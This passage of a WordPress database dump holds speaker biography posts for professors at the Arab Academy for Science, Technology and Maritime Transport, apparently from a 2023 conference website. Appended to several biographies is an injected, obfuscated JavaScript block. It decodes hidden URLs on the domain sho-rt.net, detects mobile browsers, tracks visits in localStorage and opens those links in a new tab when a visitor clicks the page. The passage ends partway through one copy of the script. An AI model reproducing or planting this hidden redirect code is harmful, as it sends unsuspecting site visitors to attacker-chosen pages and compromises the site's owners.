Engineering Center. As in 2009, he was appointed<br>to be the Head of Civil Engineering Department. In 2010, he promoted to the Head of Civil<br>and Architectural Engineering Branch. In 2011, he became the Vice Dean for the Educational<br>Affairs, who is Responsible for MTC educational Plan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br>In 2004, He joined AAST as a visiting professor then, joined as a full faculty member in 2012,<br>which appointed as The Head of Consulting Engineering Center. At the beginning of 2013, He<br>was promoted to the head of Construction and Building Engineering Department, and in 2016<br>as the vice dean for educational affairs. In 2020, he Appointed as Dean of the College of<br>Engineering and Technology. In 2021, He was honored by his appointment as Vice President<br>for educational and student affairs. In 2023 He continue as Academy President Advisor for<br>Education Affairs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br>His practical experience relates to his academic interests as a Consulting Engineer in the Field<br>of Design of Reinforced Concrete Structures and Geotechnical Engineering. He is a member<br>of the Egyptian Construction Third Party Liability Insurance Pool, Member of the Egyptian<br>Construction Reviewer of Ministry of Housing, and Member of the reviewer committee of the<br>Egyptian Code of Practice. He has designed and supervised many Reinforced Concrete, Steel<br>and Geotechnical projects.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Adel M. Belal','','publish','closed','closed','','prof-dr-adel-m-belal','','','2023-04-02 07:26:16','2023-04-02 07:26:16','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3952',0,'dt_team','',0),
(3953,1,'2023-03-28 15:05:06','2023-03-28 15:05:06','','dr-adel','','inherit','open','closed','','dr-adel','','','2023-03-28 15:05:06','2023-03-28 15:05:06','',3952,'https://gsw2023.com/wp-content/uploads/2023/03/dr-adel.bmp',0,'attachment','image/bmp',0),
(3954,1,'2023-03-28 15:07:23','2023-03-28 15:07:23','<!-- wp:paragraph -->\n<p>Prof. Dr. Ayman A. Abdel-Hamid is a professor of Computer Science in the College of<br>Computing and Information Technology (CCIT), Arab Academy for Science, Technology, and<br>Maritime Transport (AASTMT), Alexandria, Egypt. He currently holds the position of CCIT’s<br>Dean since May 2021. In addition, he is a member of the sector committee for Computer Science<br>and Informatics as part of the Egyptian Supreme Council of Universities. Previously, he held a<br>number of CCIT’s administrative positions such as the Head of Computer Science Department and<br>the Vice Dean for Postgraduate Studies and Scientific Research. Moreover, he was the manager of<br>AASTMT’s Computer Networks and Data Center, where he led to completion the design and<br>realization of AASTMT’s state-of-the-art Data Center. Furthermore, he was affiliated with the<br>Computer Science Department, Virginia Tech, USA as an adjunct professor as part of the VTMENA program.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the past, he held an assistant professor position in the Department of Computer<br>Science at Lamar University, TX, USA. He received his B.Sc. and M.Sc. in Computer Science,<br>from the Faculty of Engineering, Alexandria University, Egypt. He received his Ph.D. degree in<br>Computer Science from Old Dominion University, VA, USA. He regularly serves as a technical<br>program committee in a number of international reputed computing conferences and as a reviewer<br>for a number of notable scholarly journals. In addition, he regularly acts as the conference<br>coordinator and technical program chair of the International Conference on Computer Theory and<br>Applications, Alexandria, Egypt. His research interests and numerous scholarly publications span a<br>wide range of areas including computer and network security, computer networking, distributed<br>systems, mobile computing, network-layer mobility support, and cloud computing. He is a member<br>of IEEE, IEEE Computer Society, ACM, and ACM SIGCOMM.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Ayman A. Abdel-Hamid','','publish','closed','closed','','prof-dr-ayman-a-abdel-hamid','','','2023-04-02 07:14:07','2023-04-02 07:14:07','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3954',0,'dt_team','',0),
(3955,1,'2023-03-28 15:08:52','2023-03-28 15:08:52','<!-- wp:paragraph -->\n<p><strong>Dean,</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Port Training Institute, Arab Academy for Science, Technology and Maritime Transport, Specialized Organization of Arab League</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:preformatted -->\n<pre class=\"wp-block-preformatted\"><strong>Consultant Engineer of Structural Engineering, Egyptian Engineers Syndicate</strong>\n\nProf. Alaa Morsy is a professor of Structural Engineering, he was also head of the Construction and Building Department, college of engineering and technology, AASTMT from September 2019 to April 2022.\r\n\r\nProf. Alaa has more than 40 publications in many international scientific conferences and journals in the fields of using of advanced composite materials in reinforced concrete, and using of steel structures, finite element modelling in different types of structures, this is in addition to Geopolymer Concrete, eco-friendly and green concrete, and the environmental impact of using it.  Furthermore, Prof. Alaa has an h-index of 6 and i10-index of 4.\r\n\r\n\r\nHe participated as a speaker in many international conferences and seminars such as the MEDports Association Annual Forum and the International Conference on Structural and Geotechnical Engineering. He is also an organizing committee member of the annual International Maritime transport and Logistics conference “MARLOG” for more than 11 years.\r\n\r\n\r\nProf. Alaa is also acting as a Principal Investigator in several international projects related to the  European Neighborhood Instrument (ENI) fund, such as “Mediterranean the of Ports in Employment Youth Employment in ports of the Mediterranean, YEP-MED”,  TECHLOG - Technological Transfer for Logistics Innovation in Mediterranean area, and “Integrated Coastal Areas Management to protect the maritime environment from Ballast waters, ICAM-ECOSYSTEM”.\r\n</pre>\n<!-- /wp:preformatted -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 